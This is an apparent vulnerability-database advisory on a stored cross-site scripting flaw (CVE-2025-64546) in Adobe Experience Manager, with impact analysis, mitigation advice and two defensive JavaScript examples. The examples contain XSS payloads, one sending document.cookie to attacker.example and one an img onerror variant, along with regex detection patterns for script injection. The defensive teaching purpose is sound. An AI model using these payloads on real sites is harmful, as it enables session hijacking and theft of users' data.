CVE-2025-64546: Cross-site Scripting (Stored XSS) (CWE-79) in Adobe Experience Manager

Severity: Medium
Tags: Vulnerability, CVE-2025-64546, cve, cwe-79
Published: Wed Dec 10 2025 (12/10/2025, 18:24:21 UTC)
Source: CVE Database V5
Vendor/Project: Adobe
Product: Adobe Experience Manager

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

AI-Powered Analysis

Last updated: 12/10/2025, 19:06:29 UTC

Technical Analysis

CVE-2025-64546 is a stored cross-site scripting (XSS) vulnerability in Adobe Experience Manager (AEM) versions 6.5.23 and earlier. Certain form fields accept user input that is stored without adequate sanitization and later rendered without output encoding for the HTML context it lands in. An attacker holding a low-privileged account can submit JavaScript into such a field; when another user, including an administrator or content author, opens the page that renders the field, the script executes in that user's browser under the AEM origin.

Because the script runs inside the victim's authenticated session, it can read whatever that session can read, issue any request the victim is authorized to make (content changes, user administration, configuration edits performed through the victim's browser), redirect the victim to an attacker-controlled site, or harvest credentials through an injected form. Session cookies marked HttpOnly are not directly readable from script, but the payload does not need them: it can act through the live session.

The flaw is classified as CWE-79 and carries a CVSS 3.1 base score of 5.4 (Medium), which corresponds to the usual stored-XSS vector: network attack vector, low attack complexity, low privileges required, user interaction required (a victim must load the page), scope changed (the code executes in the victim's browser, a security authority distinct from the vulnerable server component), low confidentiality and integrity impact, and no availability impact. At the time of this analysis no patch reference or public exploit code was recorded for the entry; the vulnerability is published and should be treated as actionable now. Stored XSS in a widely deployed enterprise CMS such as AEM is a practical path to account takeover of privileged users and, through their sessions, to follow-on changes in the content repository and lateral movement into connected systems.
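The store-and-render loop behind a stored XSS, as an added example that is not AEM code and does not reproduce the specific AEM form component in question. It keeps form submissions in memory, renders them once with raw string concatenation and once with output encoding for the HTML context, and checks whether the constructed payloads survive as executable markup. All names here (saveSubmission, renderVulnerable, renderHardened, encodeForHtml, containsExecutableMarkup) are this example's own.

```javascript
// Added example, not AEM code: a minimal store-and-render loop that shows how a
// stored XSS like the one described above arises and how contextual output
// encoding removes it. All names here are this example's own.

// In-memory stand-in for the repository a CMS would persist form data to.
const submissions = [];

// A low-privileged user stores a form submission. Keeping the raw string is
// fine; the defect is in rendering, not storage.
function saveSubmission(author, comment) {
  submissions.push({ author, comment });
}

// Vulnerable render: stored fields are concatenated straight into HTML, so
// any markup the submitter included becomes part of the page.
function renderVulnerable() {
  return submissions
    .map(s => `<li><b>${s.author}</b>: ${s.comment}</li>`)
    .join('\n');
}

// Encode for the HTML text and quoted-attribute contexts: the five characters
// that can change the parser's state there. This is the same job HTL's
// automatic escaping and XSSAPI.encodeForHTML() do inside AEM.
function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened render: identical template, but every untrusted value is encoded
// for the context it is placed in.
function renderHardened() {
  return submissions
    .map(s => `<li><b>${encodeForHtml(s.author)}</b>: ${encodeForHtml(s.comment)}</li>`)
    .join('\n');
}

// Constructed payloads: a script element, and an event-handler variant that
// fires without any <script> tag (a common filter-evasion shape).
const PAYLOAD_SCRIPT = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>";
const PAYLOAD_IMG = '<img src=x onerror="alert(document.domain)">';

// Does the rendered HTML still contain executable markup from the payloads?
function containsExecutableMarkup(html) {
  return /<script\b|<img\b[^>]*\bonerror\s*=/i.test(html);
}

function demo() {
  submissions.length = 0;
  saveSubmission('alice', 'Thanks, that fixed it & saved me an hour.');
  saveSubmission('mallory', PAYLOAD_SCRIPT);
  saveSubmission('mallory', PAYLOAD_IMG);
  return { vulnerable: renderVulnerable(), hardened: renderHardened() };
}

const { vulnerable, hardened } = demo();
console.log('--- vulnerable render ---\n' + vulnerable);
console.log('--- hardened render ---\n' + hardened);
console.log('payload survives (vulnerable):', containsExecutableMarkup(vulnerable));
console.log('payload survives (hardened):  ', containsExecutableMarkup(hardened));
```

The hardened render changes nothing about what is stored; it only encodes at the point where the value meets the HTML parser. That is the property to check in any custom AEM component that renders form data: the encoding must match the context (text, attribute, JavaScript string, URL), and a value that is safe in one context is not automatically safe in another.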

Potential Impact

For European organizations, the impact can be significant, particularly where AEM runs customer-facing portals or intranet content. A successful exploit gives the attacker code execution in another user's browser session: it can expose data that session can reach, hijack the session's authority to change content or configuration, deface or manipulate published pages, and serve as a stepping stone for phishing or malware delivery that appears to come from a trusted domain. The medium rating reflects that the flaw does not on its own affect availability or give code execution on the server; the damage scales with who the victim is, and administrators and content authors are the natural targets. Sectors that commonly run AEM, such as finance, government, healthcare, and e-commerce, are exposed accordingly, and under GDPR a breach of personal data that results from exploitation may carry notification duties and financial penalties.

Mitigation Recommendations

Organizations should first inventory every AEM instance at version 6.5.23 or earlier, covering author and publish tiers and any non-production environment reachable from the corporate network. Watch the Adobe security advisory for AEM and apply the vendor fix as soon as it is available; none of the interim measures below replaces it.

Until then, reduce exposure at the points that matter for stored XSS. Review custom components that render form data: in HTL, keep the automatic context-aware escaping and avoid `context='unsafe'`; in Java, JSP, or any code that builds markup by hand, pass untrusted values through AEM's XSSAPI (`encodeForHTML`, `encodeForHTMLAttr`, `encodeForJSString`, `getValidHref`) for the exact context each value lands in. Input validation alone is a weaker control, because a value that is harmless in one context is dangerous in another. A Content Security Policy helps against stored XSS only if it disallows inline script, so `script-src` should use nonces or hashes with a tight allowlist and no `'unsafe-inline'`; roll it out in report-only mode first, since the AEM author interface itself depends on inline scripts and an untested policy will break it.

Configure the WAF to inspect POST bodies sent to form submission endpoints for script tags, event-handler attributes, and `javascript:` URIs after URL and entity decoding, and treat it as a detection layer rather than a fix, because encoding variants routinely evade signature matching. Export or query the form-data nodes in the repository and scan string properties for the same indicators; remove or neutralize anything found and record which account submitted it. Limit the set of low-privileged accounts that can write to the affected forms, and have administrators use a separate browser profile for AEM administration so that a payload reached during ordinary browsing cannot ride an administrative session.

Finally, alert on form submissions carrying those indicators and on unexpected administrative actions (user or group changes, new OSGi configurations, content deletions) shortly after a privileged user visited affected pages; that pairing is the signature of a stored XSS being used for more than a proof of concept.
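One detector applied in two places, as an added example that is not AEM code: the same indicator set scans a stored-content export (the "audit stored content" step) and request log lines (the WAF/monitoring step), decoding URL and HTML-entity obfuscation first so that `%3Cscript%3E` and `&lt;script&gt;` are caught along with the plain form. The JSON layout of the export, the log line format, the endpoint paths, and all function names (normalize, findIndicators, auditExport, auditLogLines) are constructed for this example; a real repository export or access log will differ and the walker and the log parser must be adapted to it.

```javascript
// Added example, not AEM code: one detector for script-bearing strings, applied
// to (a) a constructed JSON export of stored form data and (b) constructed
// request log lines. Formats and names are this example's own assumptions.

// Guard against out-of-range numeric entities such as &#99999999;.
function fromCodePointSafe(cp) {
  return Number.isFinite(cp) && cp >= 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : '';
}

// Strip the obfuscation layers used to slip past naive filters: URL
// percent-encoding (possibly doubled) and HTML entities. Over-decoding is
// acceptable for detection; it is never acceptable for output.
function normalize(value) {
  let s = String(value);
  for (let i = 0; i < 2; i++) {
    try { s = decodeURIComponent(s.replace(/\+/g, ' ')); } catch (_) { break; }
  }
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCodePointSafe(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCodePointSafe(parseInt(d, 10)))
    .replace(/&lt;/gi, '<').replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"').replace(/&amp;/gi, '&');
}

// Indicators of active content in what should be plain form data.
const INDICATORS = [
  { name: 'script-tag',     re: /<\s*script\b/i },
  { name: 'event-handler',  re: /<[^>]+\son[a-z]+\s*=/i },
  { name: 'javascript-uri', re: /(?:href|src|action)\s*=\s*["']?\s*javascript:/i },
  { name: 'active-element', re: /<\s*(?:svg|iframe|object|embed)\b/i },
];

function findIndicators(value) {
  const s = normalize(value);
  return INDICATORS.filter(i => i.re.test(s)).map(i => i.name);
}

// (a) Walk a nested JSON export of repository nodes and report every string
// property that carries an indicator. Returns [{ path, property, indicators }].
function auditExport(node, path = '/') {
  const hits = [];
  for (const [key, val] of Object.entries(node)) {
    if (val !== null && typeof val === 'object' && !Array.isArray(val)) {
      hits.push(...auditExport(val, path.replace(/\/$/, '') + '/' + key));
    } else if (typeof val === 'string') {
      const indicators = findIndicators(val);
      if (indicators.length) hits.push({ path, property: key, indicators });
    }
  }
  return hits;
}

// (b) Parse constructed access-log lines of the form
//   <client-ip> <user> "<METHOD> <path>" <status> body=<url-encoded form body>
// and flag POST submissions whose body carries an indicator.
const LOG_RE = /^(\S+) (\S+) "(\w+) ([^"]+)" (\d{3}) body=(.*)$/;
function auditLogLines(lines) {
  const hits = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m || m[3] !== 'POST') continue;
    const [, ip, user, , path, status, body] = m;
    const indicators = findIndicators(body);
    if (indicators.length) hits.push({ ip, user, path, status, indicators });
  }
  return hits;
}

// Constructed sample data (not a real repository export or log).
const SAMPLE_EXPORT = {
  content: {
    forms: {
      contact: {
        'jcr:primaryType': 'nt:unstructured',
        entry1: { name: 'Alice', message: 'Please call me back.' },
        entry2: { name: 'Mallory', message: '&lt;img src=x onerror=alert(1)&gt;' },
        entry3: { name: 'M', message: '<a href="javascript:alert(document.cookie)">click</a>' },
      },
    },
  },
};
const SAMPLE_LOG = [
  '203.0.113.5 alice "POST /content/forms/contact.submit.html" 200 body=name=Alice&message=hello',
  '203.0.113.9 mallory "POST /content/forms/contact.submit.html" 200 body=name=m&message=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%27%2Bdocument.cookie%3C%2Fscript%3E',
  '203.0.113.9 mallory "GET /content/forms/contact.html" 200 body=',
];

console.log('stored-content hits:', JSON.stringify(auditExport(SAMPLE_EXPORT), null, 2));
console.log('log hits:', JSON.stringify(auditLogLines(SAMPLE_LOG), null, 2));
```

The decode-before-match step is the part worth carrying over to a real WAF rule or SIEM query: the second sample log line contains no literal `<script>` at all, and the export entry that is entity-encoded would pass a filter that only looks for `<`. Anything this scanner flags in stored content should be traced back to the submitting account, since that account is the attacker's foothold.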


Technical Details

Data Version
5.2
Assigner Short Name
adobe
Date Reserved
2025-11-05T22:51:33.021Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 6939bda4fe7b3954b690adf4

Added to database: 12/10/2025, 6:36:20 PM

Last enriched: 12/10/2025, 7:06:29 PM

Last updated: 12/11/2025, 7:09:46 AM

Views: 3

Community Reviews

0 reviews

